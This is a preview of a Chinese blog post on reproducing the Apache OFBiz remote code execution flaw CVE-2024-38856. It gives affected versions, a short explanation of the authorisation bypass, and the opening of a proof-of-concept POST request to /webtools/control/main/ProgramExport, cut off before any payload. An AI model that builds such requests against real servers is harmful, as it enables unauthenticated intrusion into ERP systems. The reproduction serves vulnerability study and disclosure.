【成功复现】Apache OFBiz代码执行漏洞(CVE-2024-38856)

文章预览

网安引领时代，弥天点亮未来       0x00写在前面       本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！ 0x01漏洞介绍 Apache OFBiz是美国阿帕奇（Apache）基金会的一套企业资源计划（ERP）系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 18.12.14及之前版本存在安全漏洞，该漏洞源于存在授权错误漏洞，从而导致未经身份验证的端点可执行屏幕渲染代码。 0x02影响版本 Apache OFBiz < 18.12.14 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC （POST） 漏洞复现 POST /webtools/control/main/ProgramExport HTTP/1.1 Host : 127.0.0.1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q= ………………………………